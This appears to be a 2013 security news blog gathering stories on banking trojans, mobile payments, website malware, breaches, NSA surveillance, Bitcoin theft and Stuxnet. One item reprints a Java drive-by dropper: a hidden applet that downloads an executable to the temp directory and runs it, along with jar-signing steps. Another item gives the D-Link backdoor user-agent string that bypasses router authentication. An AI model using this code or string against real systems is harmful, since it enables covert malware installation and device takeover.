Tuesday, 3 December 2013

Neverquest Trojan: Built to Steal from Hundreds of Banks

Neverquest is a new banking trojan that spreads itself via social media, email and file transfer protocols. It possesses the capacity to recognize hundreds of online banking and other financial sites. When an infected user attempts to login to one of the sites the trojan reacts by activating itself and pilfering its victim’s credentials.
Neverquest then relays the stolen credentials back to a command and control server. Once there, the attackers can use the credentials to log into affected accounts via virtual network computing (VNC). VNC is essentially a shared desktop system, so the criminals basically use the victim’s computer to log into the victim’s online bank and perform the theft. It makes it quite impossible for the bank to distinguish legitimate users from criminals.
Kaspersky Lab announced earlier this week that the trojan has infected thousands of user-machines but – as malware expert Sergey Golovanov explains – it has the potential to do much more damage throughout the holiday season because of its efficient and versatile self-replication features. In fact, back in 2009, the Bredolab malware used the same methods of distribution that Neverquest is currently using. Bredolab would eventually become the third most widely distributed piece of malware on the Internet.
“When a user on an infected machine visits one of the sites on the list, the malware controls the browser’s connection with the server,” Golovanov explained in an analysis on Securelist. “Malicious users can obtain usernames and passwords entered by the user, and modify webpage content. All of the data entered by the user will be entered onto the modified webpage and transmitted to malicious users.”
Once the attacker has control of a victim’s account, he can empty it completely into an account under his control. In many cases, however, Golovanov notes that the attackers are moving the stolen money through a series of victim accounts. In this way, they dump money from one victim’s account into another and repeat this process several times before directly obtaining the money themselves in order to make their activities difficult to trace.
Attackers dump money from one victim’s account into another and repeat this process several times before directly obtaining the money themselves in order to make their activities difficult to trace.
Neverquest is for sale on at least one underground forum. It only seems to affect users browsing with Internet Explorer and Mozilla Firefox, but Neverquest’s creators boast that it can be modified to attack “any bank in any country.”
The malware also contains a feature that searches for specific banking-related keywords while the infected user surfs the web. If a user visits a site that includes these keywords, the trojan activates itself and begins intercepting user communications and sending them back to the attackers. If the site the victim is visiting ends up being a bank, the attackers add this new site to the list of sites that automatically trigger Neverquest. This update is then sent along through Neverquest’s command and control infrastructure to all other infected machines.
Fidelity.com, the website of one of the world’s largest mutual fund investment firms, appears to be one of the trojan’s top targets according to the report.
“Its website offers clients a long list of ways to manage their finances online,” Golovanov wrote on Securelist. “This gives malicious users the chance to not only transfer cash funds to their own accounts, but also to play the stock market, using the accounts and the money of Neverquest victims.”
Neverquest is also designed to start harvesting data when an infected user visits any number of sites not related to finance, including Google, Yahoo, Amazon AWS, Facebook, Twitter, Skype and many more.
“The weeks prior to the Christmas and New Year holidays are traditionally a period of high malicious user activity,” Golovanov wrote. “As early as November, Kaspersky Lab noted instances where posts were made in hacker forums about buying and selling databases to access bank accounts and other documents used to open and manage the accounts to which stolen funds are sent. We can expect to see mass Neverquest attacks towards the end of the year, which could ultimately lead to more users becoming the victims of online cash theft.”
He continues:
“Protection against threats such as Neverquest requires more than just standard antivirus; users need a dedicated solution that secures transactions. In particular, the solution must be able to control a running browser process and prevent any manipulation by other applications.” 
Luckily, Kaspersky Lab has such technology called Safe Money. As a part of Kaspersky Internet Security and Kaspersky PURE, it protects user’s interactiona with financial sites, paying specific attention to the security of the encrypted connection and the absence of third-party control over web browsers.

The State of Mobile Payments and the Rise of Content Driven Commerce

It’s a weird time for mobile payments. Years ago it was thought that by now some parts of the world would be well on their way to if not fully entrenched in NFC payments: Customers using ‘Near Field Communication’ technology to purchase coffees on the go, telling a tiny chip in their smartphones to deduct the money directly from their bank account.
Now it’s almost 2014 and with every new iPhone release failing to fulfill a juicy NFC rumor, critics have been quick to write its obituary.
Still though, a recent Federal Reserve study claims 22 percent of mobile phone users have used their phone for banking before.
But even with the proliferation of mobile payment apps like PayPal, Square and LevelUp, only a scant 15 percent of smartphone users use their devices to regularly purchase goods and services, a far cry from mobile payment domination.
A group of CEOs and mobile banking directors met last week in one of the most technologically savvy cities, San Francisco, to conduct a panel on all things mobile to see why exactly that is. In a discussion at MEF’s Global Forum on Friday panelists described the challenges they’ve encountered, debated how secure digital money really is and asked each other where they think the industry is going.

Darren Foulds, a mobile banking director at Barclays pointed out early in the panel just how ubiquitous mobile payments have become: He compared them to texting.
Barclays, one of the largest banks in the world, made headlines last year when it introduced a mobile banking app called Pingit that has a similar goal: Let users send money back and forth between mobile phone numbers as easily as users can text back and forth.
Technology adoption has its ebb and flow though and that’s what’s happening in the UK. Mobile phone users in the United States meanwhile have been less receptive to purchasing items and transfering money with their phones.
It shouldn’t come as a surprise but the public’s concern over security is one of the main barriers preventing the full-fledged takeover of mobile transactions.
Like PCs and laptops before them, mobile devices have become ripe for malware and cybercrime. Malicious apps that want your credit card numbers can still lurk in the darker corners of Apple’s app store and Google’s Play marketplace. Mobile malware has exploded exponentially over the last two years, with Kaspersky Lab researchers discovering some of the most advanced Android malware yet over the summer.
The public’s concern over security is one of the main barriers preventing the full-fledged takeover of mobile transactions.
Not to mention what happens when we lose or misplace our phones? We already store sensitive information like friends’ e-mail addresses, conversations and photos on these devices. If we kept our banking information on our phones, wouldn’t losing it be the same thing as losing our wallet?
A recent PriceWaterhouseCoopers survey around the resistance to mobile payments found that 85 percent of respondents are afraid of their phones getting stolen, 79 percent are afraid of having their information stolen while transmitting payments wirelessly and 74 percent are afraid of having too much information in the same place.
Aunkur Arya, the Mobile GM at Braintree, a Silicon Valley-based payment platform believes most of these fears are being blown out of proportion.
“I think it’s a much, much smaller problem than the mainstream media believes,” Arya said during the panel, “the whole notion that a piece of plastic with a magnetic strip is more secure than a device… something you know has two-factor authentication… is just irrational.”
Two-factor authentication of course is the added security measure that sites like Facebook, Google and Twitter have adopted in recent years that requires users to enter in a randomized numeric code in addition to their regular password to access websites and e-mail.
Arya noted that as digital money gets more popular there would assuredly be some problems but that users should look at the ongoing switch to digital as a “mindset shift.”
Hannes Van Rensburg, the CEO of VISA Mobile argued that there’s not so much of a security issue with mobile payment adoption as there is an education issue.
“Consumers are worried about what they don’t understand,” Van Rensburg said, adding that if companies can better explain what happens when something goes wrong, for example when a customer’s security is compromised, they’ll be in better shape.
Another panelist, Kevin Grant, the head of mobile payments at Boku, a payment system that relies on a phone number for safe and secure payment, says he’s already seen the new mobile payment dynamic in action.
“You’re seeing us move into traditional roles. Now when new customers come in we’re putting their phone number on file, not their card number,” Grant said.
No doubt Van Rensburg, Grant and others have their eyes – and their wallets – focused on the future. Mobile payments and technology are already becoming so entwined; developers and executives are looking for the next way to capitalize on those connections.
Starbucks for example tried to pierce the ever-changing mobile payments landscape just last month with Tweet-a-Coffee, a service that can send a $5 gift card to customers via Twitter. The amount isn’t connected to a bank account or credit card and is prepayment for goods and services at certain stores. Users can receive and spend the money with virtually no strings attached.
Many of the panelists lauded Uber, the car service that users can summon simply by clicking a button on their smart phones, for beginning to master the next big thing in mobile payments: Content driven commerce.
Uber notes your GPS and upon a user’s request can send a black car to the destination of their choice for pickup. Once the user has been transported the app deducts a predetermined amount from their bank account. It’s not a cheap service and won’t overtake taxicabs anytime soon but the application is intuitive and involves minimal interaction from users.
Uber is breaking new ground by taking many of the troubles out of mobile payments and moving them to the background. Similar to Google Now, a personal assistant app Google pushed to the company’s Android phone line over the past year or so, Uber does a great job learning about its customers, noticing trends and predicting what they want before they have to ask the app.
“Does this merchant have my payment? Do I need to re-enter my info? Is this app going to be secure? Does this merchant ship to me?” Arya ran down a list of possible questions users may need to ask their device.
According to Arya, the narrative for apps in the future is going to be focused on surveying that experience.
All of those questions are all going to be extracted by devices. When it comes to purchasing things with their device, if a user performs let’s say, seven to eight mobile commerce experiences a week, those are all going to be strung together to form a context driven process.
“Where payments are going in general are about merchants recognizing that they’re going to get their money,” Van Rensburg added. “You used to be able to hand someone a VISA and that’s how they’d know but now with Uber, they can authenticate you by your phone and know you’re not someone strange getting into their car.”
The phone, if properly secured, should continue be an excellent vehicle for carrying even the most sensitive information going forward, providing of course, technology and the public mindset can keep up.
Still, both mainstream mobile OS developers, Apple and Google, are in their relative infancy when it comes to embracing mobile payments, something that could continue to handicap the technology.
The same thing, lack of development, is what’s holding mobile payment security back.
Since human beings have used cash for centuries and credit cards for decades, it makes sense that it will be a slow transition.
As it stands now, if a user has their phone stolen and it contains their credit card information, they better have a strong passcode or swipe pattern. Even that may not help though. As some Threatpost readers may know, many hackers have proved adept at cracking smartphone locks over the past few years.
If someone has their phone stolen and that person has gotten complete access to their device there’s only so much they can do to prevent them from accessing apps that use their credit card information. The iPhone allows users to remotely wipe their phone via Apple’s iCloud feature. Elsewhere, Google also allows users of some of their phones to remotely wipe them.
It’s really going to be a two-way street with security though until the mobile payments game picks up steam.
Until users’ fears are addressed, two-factor authentication is more widely-adopted and there are better industry standards in place for treating our devices as a wallet, the technology will face an uphill battle going forward.

Web Malware: Out of the Shadows and Hiding in Plain Sight

There is an all-too common misconception that in order to become infected with web-propagated malware, you must visit sketchy parts of the Internet’s underbelly or a website within that broad class of which is “not safe for work.” Thus, when you admit to your buddies that your computer is beset by malware, one of them invariably makes some sort of joke about how you’ve been spending too much time on this or that pornographic website.
In reality though, the old days of becoming infected with malware by visiting adult websites are largely over. Those websites, unlike most, probably make money. Therefore, it behooves them to ensure that they are not infected with malware.
In my experience, most malware infected websites are the ones that no one expects to be infected with malware.
With any malware infection, there are really two primary philosophies, trawling and spear-phishing. On the one hand, you can cast as wide a net as possible in order to catch as many fish as possible; the strategy for botnet operators and the progenitors of banking trojans. On the other hand, you pick a fish, go to where it lives, set your hook with the kind of bait you know it likes to eat, and catch it. Likewise, you can find a vulnerability in a popular site and infect it with malware in order to draw in as many infections as possible. Or you can find a vulnerability in a site that you think your intended target will visit. This second method has a name. Its name is a watering hole attack, which derives from wilderness reality that ambush predators hide near water sources, where they know their prey will eventually have go to drink. These predators merely wait until their prey’s head is down to drink, and they attack. Similarly, an attacker will estimate which sites his target is likely to visit and look for vulnerabilities in them.
The broad-style of attack manifested itself last week when the popular humor website cracked[dot]com was infected with malware. Researchers from Barracuda Labs expressed concerns that the number of infections arising from this attack could be quite high considering that the site ranks 289 in the U.S. and 654 globally, according to the Web information firm, Alexa. Similarly, the web-developer resource site PHP[dot]net was recently infected according to Spiderlabs research, as were a small handful of Russian banking sites (you may need to brush up on your Russian to read this).
The more refined or targeted style of attack is perhaps best demonstrated by the rash of watering hole attacks targeting the Department of Labor websites earlier this year. In this case, the targets were likely individuals with access to sensitive government networks. More recently, researchers from the security firm FireEye reported a watering hole attack against an unnamed U.S.-based non-governmental organization (NGO) website hosting domestic and international policy guidance.
In general, the point is this: who would think that the Department of Labor’s website would be serving malware? But that’s the point exactly: to infect an unlikely site where visitors have their guards down.
There is no such thing as perfect security. You never know where an attacker may be hiding malware. They use automated tools to determine which websites contain exploitable vulnerabilities. Therefore, you’re dually relying on the website administrators install updates that will have to have been built by the various software vendors. If admins are anything like normal Internet user’s then they probably aren’t very good about implementing patches. For sure, vendors are much better than they used to be about building patches, but there are still an alarming number of companies in this space with no patch schedule whatsoever.
Because of all of this, the easiest way to protect yourself from websites containing malware is to run an antivirus program, pay attention to browser warnings, and read security news, whether you are surfing on your PC, Mac, tablet or phone.

New undetectable Java drive-by exploit published

The recently published java drive by exploit is undetectable (FUD) and it allows the attacker to download and run a file at the targeted computer. The executable malware gets downloaded to the temporary directory where it sleeps for a while, once it is awakened it will execute the commands that are coded in the malware that has been downloaded.

Published code:
* java drive-by tmpdir (2,754 bytes)
*      fully undetectable (FUD)
* This software must be used for education purposes only! 
* By using this software in any other way you may violate the law!
* author: sp3c1aliz3d
* twitter: @Sp3c1aliz3d
/* html iframe iframe.html */
// iframe.html <applet width='1' height='1' code="update.class" archive="update.jar"> </applet>
/* compile/setup setup.sh
javac update.java
jar -cfv update.jar update.class
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar update.jar update.jar signapplet
/* java (update.class/update.jar) */
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.io.File;
import java.io.IOException;
import java.nio.channels.*;
import java.net.URL;
import java.io.FileOutputStream;
import java.util.Random;
import static java.lang.Thread.sleep; // no need for full import list
public class update extends Applet {
  public void init() {
    try {
     Random random = new Random();
          try {
               sleep(random.nextInt(9000) + 1);
          } catch (Exception e) {
          Process localProcess = null;
          URL website = new URL("");
          ReadableByteChannel rbc = Channels.newChannel(website.openStream());
          FileOutputStream fos = new FileOutputStream(System.getProperty("java.io.tmpdir") + "xxx.exe");
          fos.getChannel().transferFrom(rbc, 0, 1 << 24);
          localProcess = Runtime.getRuntime().exec(System.getProperty("java.io.tmpdir") + "xxx.exe");
    } catch( Throwable e ){}

D-Link upgrades its firmware to fix backdoor presence

D-Link company has recently released a new version of firmware to fix backdoor vulnerability in various network device models.

Last October the security expert Craig Heffner discovered a backdoor inside different D-Link routers. Craig published an interesting blog post on “/dev/ttyS0″ on the reverse engineering of the backdoor (CVE-2013-6027) present in many D-Link devices, it described how an attacker was able to alter a router setting by passing the authentication mechanism.
Craig reverse engineered the D-Link Backdoor, discovering that if attacker browser user agent string is xmlset_roodkcableoj28840ybtide, he can access the web interface of the D-Link device bypassing authentication procedure and view/change the device settings.
Reading the string xmlset_roodkcableoj28840ybtide backwards it appears as “Edit by 04882 joel backdoor“.
Last week, D-Link has issued a new release of firmware for the vulnerable router models, the new software includes a fix to prevent unauthorized administrator access. D-Link has released the updates for the following models:
  • DIR-100
  • DIR-120
  • DI-524
  • DI-524UP
  • DI-604UP
  • DI-604+
  • DI-624S
  • TM-G5240
D-link routers firmware updates
The security advisory issued by D-Link suggests users to do not enable the Remote Management feature to avoid being a victim of a cyber attack that exploits the backdoorBelow the recommendation provided by the D-Link Company to its customers:
  • Do not enable the Remote Management feature since this will allow malicious users to use this exploit from the internet.  Remote Management is default disabled on all D-Link Routers and is included in customer care troubleshooting if useful and the customer enables it.
  • If you receive unsolicited e-mails that relates to security vulnerabilities and prompt you to action, please ignore it. When you click on links in such e-mails, it could allow unauthorized persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages where you are asked to click or install something.
  • Make sure that your wireless network is secure.
If you are interested to find vulnerable devices within your organization you can use the NMAP script written in Python and published on pastebin.

Kaspersky and Bitdefender Earn Top Marks for Malware Cleanup

Some antivirus tests are really, really simple. For example, you could run a scan on a test system containing 100,000 static malware samples and record how many of those were detected. Testing how products handle malware that has already infected the system is quite a bit tougher, but can reveal more about an antivirus product's malware-fighting prowess. That's what the malware removal test by AV-Comparatives tries to do.
To get started, the researchers chose 11 widely prevalent samples known to be detected by every product under testing. I wish they'd used a larger sample set; 11 is pretty small. The report notes that they started with more, but eliminated some samples on finding that "their malware behavior/disinfection process was identical to samples already included."
With sample selection complete, they installed each on a test PC, carefully monitoring the changes it made to the file system and Registry. Then they installed an antivirus product and recorded how well it managed to clean up the problem.
As I've seen in my own testing, sometimes getting protection installed on an infested system can be difficult. If malware prevented initial installation, they tried installation in Safe Mode. If that failed, they resorted to a rescue CD (if available). Once they got the product installed, they ran a full scan and rebooted.
Clean and Convenient
Just how do you rate an antivirus product's success at cleaning up malware? AV-Comparatives choose to rate on thoroughness of removal, but also on convenience.
A product that cleaned up all malware traces, or all but the most negligible, earned an A for removal. If some executable files or other significant traces remained, that earned a B. Failing to correct dangerous malware-caused problems like a compromised HOSTS file or disabled Task Manager drops that grade to a C. Finally, failing to remove the malware or leaving the test system unusable rates a grade of D.
Getting the system clean is good; doing it without hassling the user is better. If the researchers managed to install the product and run a full scan without incident, that's worth an A for convenience. A cleanup that needed rebooting to Safe Mode or other manual actions got a B. If getting the system cleaned up required booting to a Rescue CD, that's a C for convenience. And of course a failed removal earns a D.
They went on to quantify these ratings for comparison purposes. A thorough and convenient cleanup would rate AA, valued at 100 points. Thorough cleanup with some manual labor would get AB, worth 90 points, and so on.
Clear Winners
Kaspersky Internet Security (2014) almost aced this test. It earned an A for removal in every case, and an A for convenience in all but one. With an average of 98 points it's at the top. Bitdefender Internet Security (2014) came very, very close—all AA ratings except for one AB and one AC, averaging out to 97 points. These two, along with five other products, earned an overall rating of ADVANCED+, the highest possible rating.
avast! Free Antivirus 2014 is a different kind of success story. In the previous removal test it rated STANDARD, the lowest passing grade. This time it joined the winners circle with an ADVANCED+ rating.
Advice for the Vendors
The full report concludes with advice for antivirus vendors, things they could do to improve the malware cleanup skills of their products. Most companies offer a bootable rescue CD for emergencies; those that don't, well, they should. The report also recommends creating an alternate installer that doesn't require access to the company website, in case access is blocked by malware, and checking for active malware at the start of the installation process.
If you've got a malware problem and need to clean it out, look for a product with a good score in this test. AV-Comparatives only runs the malware removal test once each year, which is a shame. I'd like to see them put it on a more frequent rotation, with more samples.

Pick-Up Lines That Will Only Attract Hackers

Cupid Media hacked
Searching for that special someone to share a sweet moment with underneath the mistletoe? If you're trying your luck with different dating websites, make sure you take precautions to protect your personal information. According to a blog post by KrebsOnSecurity, online dating service Cupid Media exposed more than 42 million consumer records in January 2013.
Stealing the LoveUsers' names, email addresses, unencrypted passwords, and birthdays were all exposed in this security breach on this Australian-based dating service. Interestingly, all of this stolen data was found on the same server where cybercriminals stored scores of personal records taken from well-known sources like Adobe, PR Newswire, and the National White Collar Crime Center (NW3C).
Even though this attack happened nearly eleven months ago, Cupid Media only recently admitted publicly to the breach. The company's managing director, Andrew Bolton, claimed that they notified the affected customers and reset passwords for specific sets of user accounts. The dating service is also double-checking that all the affected accounts reset their passwords and received consequent confirming notifications. Unlike a handful of other companies, Cupid Media doesn't send their users their passwords in plain text when a password reset is requested.
Similar to the security breach on software company Adobe Systems Inc., Cupid Media didn't have to notify every account user because several are inactive. This doesn't bode well for those millions of unused accounts that the companies still have stored because their data was still stolen and leaked online.
Get Creative and Protective with PasswordsLarge security breaches like these can lead to disasters for users. Many people reuse the same passwords for different sites, which give hackers access to any websites that hold users' sensitive data, such as email inboxes.
Cupid Media's users aren't very creative in the password department. Apparently "123456" and "111111" were used as passwords well over a million times for the site. For those who decided to rely solely on letters, over 90 thousand users chose the password "iloveyou," and over 50 thousand decided on "lovely".
As entertaining and ridiculous as these passwords are, they highlight some important things to keep in mind. Make sure you create hard-to-crack passwords, and don't use the same password for more than one website. A handy tool to help you with this is a password manager, which can generate difficult passcodes; one of our favorites is LastPass 3.0. If you're tempted to put a lot of personal information online, keep in mind you're the one who has to effectively protect it.

Advertising Companies Rob the Smartphone Cradle

Data Baby
Have you friended a certain Rebecca Taylor on Facebook recently? You might have actually just accepted a friend request from Channel 4 News investigators. Channel 4 News decided to track data sent from a mobile phone by collaborating with IT security company MWR InfoSecurity.
The Setup"Data Baby," otherwise known as online as Rebecca Taylor, is creation of the television station's technology producer, Geoff White. White asked MWR InfoSecurity to build a data interceptor to track this virtual persona's mobile phone activity and see how much information the phone sends automatically to websites.
The "black box" from MWR InfoSecurity, followed the active social media and web life of this fictitious young English woman, tracing where her data went and who was using it. It stored the flood of communications between Data Baby's phone and servers across the globe.
Where's All The Info Going?White and his colleagues discovered that in the course of a day the phone was in contact with 350 servers around the world and sent and received 350,000 packets of information. Within a one-hour idle period, the phone sent over 30,000 packets of information to 76 servers. Its specific identifier was sent out six times to ad networks in the states and its exact location was sent to a Ukrainian advertising agency.
Smartphones have heightened the use and abuse of personal data because they've increased the amount of information people send and receive daily. They also allow advertisers to track users' movements through location data.
Treat Your Smartphone Like Your BabyEven when your smartphone is idle, it's still sending out hundreds of thousands of messages. While some of this traffic helps the phone function, most of the information exchange is simply sharing user's personal information with advertising companies.
Treat your smartphone like your PC; it has just as much or even more sensitive data than what you leave at home. Every time you install an app, read the list of permissions before automatically agreeing to allow them all. Keep your device updated and consider installing antivirus software on your device for extra preventative measures against hackers. Even though you can't prevent your mobile device from sending and receiving messages, you can limit the amount of personal information on your device. Be smart about what you put on your smartphone; it's a lot more active than you think

NSA's Porn-Shaming Strategy

Image via Flickr user EFF
The disclosures from the Snowden files keep on coming, with each revelation more disturbing than the last. The latest report reveals a plan by the National Security Agency to collected information on six people's online activity, particularly their visits to pornographic websites, to discredit them within their community.
This is an example of "how 'personal vulnerabilities' can be learned through electronic surveillance, and then exploited to undermine a target's credibility, reputation, and authority," activist Glenn Greenwald wrote in the Huffington Post on Tuesday evening.
In the document dated October 2012, the NSA identified six Muslim men who were "prominent, globally resonating foreign radicalizers." The document claimed the NSA had collected information about these individuals, which if exposed, "would likely call into question a radicalizer's devotion to the jihadist cause, leading to the degradation or loss of his authority."
The NSA had evidence of these men viewing sexually explicit material online, using sexually explicit language when communicating with young girls, using donations to pay personal expenses, charging exorbitant speaking fees, and using questionable sources and contradictory language, according to the document, portions of which Huffington Post has published on its site. These people could be accused of online promiscuity, wanting to be famous, or for having a "glamorous lifestyle," according to the report.
"Issues of trust and reputation are important when considering the validity and appeal of the message," the document said. It would be possible to look at the person's activities, contacts, and "vulnerabilities of character," to undermine the credibility of the radicalizer and his message.
The most disturbing takeaway from this document is this simple fact: none of the six individuals the NSA was monitoring were accused of being involved in terrorism.
Your Activities Used Against You
Let's rephrase that: The NSA is taking advantage of its massive surveillance programs to spy on people who weren't terrorists.
Whatever happened to focusing on just the people who pose an imminent threat to the United States? The NSA chief Gen. Keith Alexander and various officials have repeatedly insisted that despite having so much data at their fingertips, they are pulling out data to investigate only those people they believe are engaged in activities against the U.S. 
None of the individuals named in this document are currently residing in the United States, and while one of them have been imprisoned for hate speech against non-Muslims and one had promoted al-Qaeda propaganda, there was nothing to suggest that the NSA was concerned about their actual involvement in a potential terrorist attack. So far, their activities fall under speech, and at least one of them is a U.S. citizen or permanent resident, which means the Constitution still applies to that person.
"This is not the first time we've seen States use intimate and private information of an individual who holds views the government doesn't agree with, and exploit this information to undermine an individual's message," Privacy International told Huffington Post.
Policy vs Strategy
This revelation caused a lot of discussion within the PCMag team. The documents show that the NSA discussed a plan, a strategy, on what it could do to these individuals, but it was not an actual policy that the NSA had adopted. One argument was that discussing what the government could do was not the same as the government deciding to do something and actually carrying it out, and these documents still don't show that the NSA did anything wrong.
"If people are engaged in trying to recruit folks to kill Americans and we can discredit them, we ought to," Stewart Baker, a one-time general counsel for the NSA and a top Homeland Security official in the Bush administration, told Huffington Post.
On the other hand, there is nothing to indicate that the NSA hasn't approved this plan, or was on the verge of doing so. The document is only a year old, and the government isn't always known for being nimble. The "what if?" raises some disturbing questions.

Death message: Google Nexus phones can be remote-crashed by SMS, researcher warns

At least two recent models of Google’s flagship Nexus Android handsets can be crashed remotely – simply by sending them a flurry of SMS text messages, a Dutch researcher has warned.
Normal text messages, of course, don’t work – the attack depends on special Class 0 messages, made by software for the purpose, according to Bogdan Alecu’s paper.
“Instead of falling into a user’s inbox and waiting for someone to read the message, a Class 0 or “flash message” pops up immediately as a message window that the user is supposed to decide whether or not to save,” the Register said in its report.
The reason these messages can be used to attack Nexus devices is that Google’s handsets do not offer the user a signal when they arrive – meaning an attacker can pile up dozens at once.
PC World reported that the attack was effective, disabling a device rapidly, although a second demonstration failed as several of the SMS attacks did not arrive.
The Verge reports that the attack works best against the three latest Nexus smartphones, running any version of Android from Ice Cream Sandwich to Kitkat. Alecu told PC World that he tested 20 other devices, but the attack did not immediately work against those.
Alecu claims that the vulnerability could be used to crash phones remotely – and leaving them unable to even make calls or access the internet. Alecu describes this as a “Class 0 message Denial-of-Service” attack, and describes how, “When sending over 30 messages to a Google device running Android, messaging application stops, phone reboots, radio application restarts, but Internet no longer works.”
The problem is worse, Alecu says, if SIM PIN protection is enabled, “If If SIM PIN protection is enabled, there is no phone signal, no calls,” he said. His discovery was published at Defcamp 2013.
Alecu claims that Google has known of this vulnerability for some time, but has failed to act on it. “We thank him for bringing the possible issue to our attention and we are investigating,” a Google representative said via email to PC World.

Millions in Bitcoin stolen from Sheep dark market as user flees

One of the ‘dark marketplaces’ offering illegal and semi-legal services via the anonymized web browser Tor has shut down, according to reports – with a user fleeing with millions of dollars worth of Bitcoin.
A senior user of Sheep Marketplace “stole” a large number of bitcoins totalling $4.9 million, according to the BBC’s report.The actual figure may have been much higher. Business Insider claims up to $44 million was taken.
“We are sorry to say, but we were robbed on Saturday 11/21/2013 by vendor EBOOK101. This vendor found bug in system and stole 5400 BTC – your money, our provisions, all was stolen,” the site admins said in a statement.
“We were trying to resolve this problem, but we were not successful. We are sorry for your problems and inconvenience, all of current BTC will be ditributed to users, who have filled correct BTC emergency adress. I would like to thank to all SheepMarketplace moderators by this, who were helping with this problem. I am very sorry for this situation. Thank you all.”
Sheep Marketplace gained many customers and sellers during the brief period Silk Road was inactive. At present, the site is unreachable via Tor. Some reports, such as this via TapScape, suggest that the entire site was a scam designed to earn Bitcoin, created during the period while Silk Road was offline.
Business Insider reports that the theft may have been much bigger than initial reports, “Sheep users and other Bitcoin followers on reddit say that the administrators began blocking withdrawals of bitcoins from the site more than a week ago, and may have absconded with as much as $44 million from the site’s users, pointing to a movement of 39,900 bitcoins visible in the public record of Bitcoin transactions known as the blockchain.”
Site users have begun their own detective work, chronicled on a Reddit thread devoted to the thefts, “He was desperately creating new wallet addresses and moving his 49 retirement wallets through them, but having to wait for 3 or 4 confirmations each time before moving them again. Each time I caught up, I “666″ed him – sent 0.00666 bitcoins to mess up his lovely round numbers like 4,000. Then,all of a sudden, decimal places started appearing, and fractions of bitcoins were jumping from wallet to wallet like grasshoppers on a hotplate without stopping for confirmations.”
“I think he’s asleep now in the czech republic. When he awakes, he will see my “666″ next to his 96,000 stolen, freshly-laundered bitcoins. Along with lots of insults attached to fragments of bitcoins that I hope you are about to send here…”
It’s the latest in a series of “heists” involving the cryptocurrency, as reported by We Live Security here. Despite FBI action against ‘dark market’ sites such as Silk Road, illegal commerce still thrives on Tor – and Silk Road relaunched as Silk Road 2.0.

Governments preparing Stuxnet 2.0 malware for nuclear strike

Cooling towers at a nuclear power station
The Israeli and Saudi Arabian governments are working to create a new, even more destructive variant of the notorious Stuxnet malware, according to local Iranian news outlet Farsnews.
Farsnews reported that an unnamed source with links inside the Saudi Arabian secret service confirmed the news, warning the two nations plan to use it to further disrupt Iran's nuclear power program.
"Saudi spy chief Prince Bandar bin Sultan bin Abdulaziz Al Saud and director of Israel's Mossad intelligence agency Tamir Bardo sent their representatives to a meeting in Vienna on 24 November to increase the two sides' co-operation in intelligence and sabotage operations against Iran's nuclear program," claimed the unnamed source.
"One of the proposals raised in the meeting was the production of a malware worse than the Stuxnet (a comprehensive US-Israeli program designed to disrupt Iran's nuclear technology) to spy on and destroy the software structure of Iran's nuclear program."
The original Stuxnet malware was uncovered targeting Iranian nuclear systems in 2010, and is believed to have been a joint project between the US and Israeli governments. The malware is considered a game changer in the security community for its ability to physically sabotage systems in power plants.
It is currently unclear if the Farsnews report is accurate, though director of security strategy at FireEye Jason Steer said it is certainly plausible.

"Given that this has already happened with Stuxnet, it is certainly more than plausible to believe that Stuxnet 2.0 is also possible. One would be naive to assume it wouldn't happen again. With the change in relationship between Iran and the US, it is highly likely that Israel and Saudi Arabia united to try and negate the threat of nuclear bombs on their front door,” he said.
The original Stuxnet worm hijacked control of Siemens industrial control systems, then forced them to alter key processes to damage machinery. The malware has since managed to spread outside of Iran and has affected several other power plants, some close to Europe.
Steer told V3 that, given how successful the original Stuxnet was at spreading, the fallout of a more advanced variant could be devastating for power plants, but will be of little concern to most regular businesses.
“Stuxnet was pretty powerful at disrupting the SCADA environment it was introduced to and has since jumped and gone into the wild – where it has even appeared on the International Space Station and Russian power stations, that we are aware of. So we should expect Stuxnet 2.0 to have an impact of a similar nature,” he said.
“Most businesses don't run SCADA [supervisory control and data acquisition] systems so unless you run a refinery, oil pipeline or something similar, then they will be safe from these types of industrial-style attacks. Most businesses should be more worried about the cybercrime attacks that wash up via email and on web pages their employees surf to every day that will enable remote access capabilities to their network, like Zeus and Houdini, that are exfiltrating data out of their business.”
Security tycoon Eugene Kaspersky confirmed in November that at least one Russian Nuclear Plant has been very badly infected by Stuxnet. Security experts have since said it is only a matter of time before a Stuxnet infection is discovered in the UK.
Attacks on critical infrastructure areas, such as power, are a growing problem facing governments and businesses. Numerous other cyber attacks have been uncovered hitting companies involved in critical infrastructure areas, and many of these attacks are currently believed to stem from China.

Akamai buys Prolexic to boost cloud computing security

Cloud computing
Akamai Technologies has announced its intention to acquire security firm Prolexic Technologies in order to offer customers using its cloud platform protection against cyber attack from the internet.
The acquisition, which is expected to close in the first half of 2014, will see Akamai purchase all of the outstanding equity of Prolexic in exchange for a cash payment of approximately $370 million. The buyout is subject to the usual conditions, including regulatory approvals.
Akamai, which operates a cloud-based content delivery network with a global presence, said the move will enable it to provide customers with a comprehensive portfolio of security solutions to defend their web and IP infrastructure against application-layer, network-layer and data centre attacks.
This will include protecting the full suite of enterprise IP applications Akamai offers, from email to file transfers and virtual private networking (VPN), especially against the threat of distributed denial-of-service (DDoS) attacks.
"Any company doing business on the internet faces an evolving threat landscape of attacks aimed at disrupting operations, defacing the brand, or attempting to steal sensitive data and information," said Akamai chief executive Tom Leighton.
The firm also said that being able to rely on one provider for internet performance and security will greatly simplify resolution of network availability issues for customers, and offering them a single point of reference for accountability.
Akamai's move may also be seen as part of a wider trend by internet and cloud computing vendors to buy in security expertise to counter the growing threat from cyber criminals.
Earlier this year, Cisco snapped up cyber security specialist Sourcefire for $2.7bn in order to bolster the security of its products, while Blue Coat Systems acquired Solera Networks.

Bogus apps duping users into Bitcoin mining for criminals

Cyber criminal gangs are expanding their Bitcoin operations by creating increasingly sophisticated ways to force machines to mine for them, according to researchers at security firm Malwarebytes.
Lead malware intelligence analyst Adam Kujawa reported detecting a number of Potentially Unwanted Programs (PuPs) carrying Bitcoin-mining malware in a public blog post, warning that in many cases they even get the victim to unwittingly agree to hand over control of their PC.
"A recent and unfortunate discovery by some of our users revealed that some of these programs do more than just cover your desktop in ads, they also steal your systems' resources for mining purposes," read the post.
"This time, however, we are taking a look at a PuP that installs a Bitcoin miner on the user system, not just for a quick buck but actually written into the software's end-user license agreement (EULA). This type of system hijacking is just another way for advertising-based software to exploit a user into getting even more cash."
